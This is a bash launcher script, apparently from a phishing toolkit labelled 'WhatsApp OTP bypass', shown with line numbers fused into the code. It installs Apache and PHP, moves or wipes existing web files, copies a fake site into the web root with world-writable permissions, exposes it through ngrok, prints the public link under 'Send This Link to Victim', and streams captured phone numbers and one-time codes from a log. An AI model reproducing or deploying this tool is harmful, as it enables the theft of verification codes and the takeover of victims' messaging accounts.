Path: blob/master/sites/whatsapp-phishing/Whatsapp.sh
738 views
#!/bin/bash12stop() {34checkngrok=$(ps aux | grep -o "ngrok" | head -n1)5if [[ $checkngrok == *'ngrok'* ]]; then6pkill -f -2 ngrok > /dev/null 2>&17killall -2 ngrok > /dev/null 2>&18fi9if [[ -e sendlink ]]; then10rm -rf sendlink11fi1213}141516sleep 217# spinner18spinlong ()19{20bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++"21barlenght=${#bar}22i=o23while ((i < 100 )); do24n=$((i*barlenght / 100 ))25printf "\e[00;32m\r[%-${barlenght}s]\e[00m" "${bar:0:n}"26((i += RANDOM%5+2))27sleep 0.428done29}303132#clolors33white='\e[1;37m'34green='\e[0;32m'35blue='\e[1;34m'36red='\e[1;31m'37yellow='\e[1;33m'38echo ""39echo ""40414243clear44echo -e $green " ╦ ╦┬ ┬┌─┐┌┬┐┌─┐╔═╗┌─┐┌─┐ ┌─┐┌┬┐┌─┐ ┌┐ ┬ ┬┌─┐┌─┐┌─┐┌─┐ "45echo -e $green " ║║║├─┤├─┤ │ └─┐╠═╣├─┘├─┘───│ │ │ ├─┘───├┴┐└┬┘├─┘├─┤└─┐└─┐ "46echo -e $green " ╚╩╝┴ ┴┴ ┴ ┴ └─┘╩ ╩┴ ┴ └─┘ ┴ ┴ └─┘ ┴ ┴ ┴ ┴└─┘└─┘ "47echo -e $white " ++++++++++++++++++ OTP BYPASS ++++++++++++++++++++++++ "484950echo ""51echo ""52echo -e $'\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m]\e[0m\e[1;32m >> DOWNLOAD REQUIREMENTS >> \e[0m'53sleep 254echo""55sudo apt-get install apache256apt install php57apt install jq58apt install tail59apt install curl60systemctl start apache261apt install xterm62apt install gnome-terminal63systemctl restart apache2.service64mkdir /var65mkdir /var/www66mkdir /var/www/html67mv /var/www/html/* /var/www/68rm -rf /var/www/html/*69cp -R * /var/www/html/70cd ..71clear72cd /var/www/html/73chmod +x *74chmod 7777 *75sleep 376clear77./ngrok http 80 > /dev/null &7879echo ""80echo -e $'\e[1;31m[\e[0m\e[1;77m+\e[0m\e[1;33m]\e[0m\e[1;92m >> WAIT FOR NGROK UP !\e[0m'81sleep 2582echo ""83clear84./Logo.sh85echo ""86echo -e $yellow "// [ Send This Link to Victim ] //"87echo ""88echo -e $white89curl -s localhost:4040/api/tunnels | jq -r .tunnels[1].public_url90curl -s localhost:4040/api/tunnels | jq -r .tunnels[0].public_url91echo ""92echo ""93echo -e $green "// [ CREDENTIAL ] //"94echo ""95tail -f log.txt | grep -e "number" -e "OTP" -e "otp"96979899;;100101102103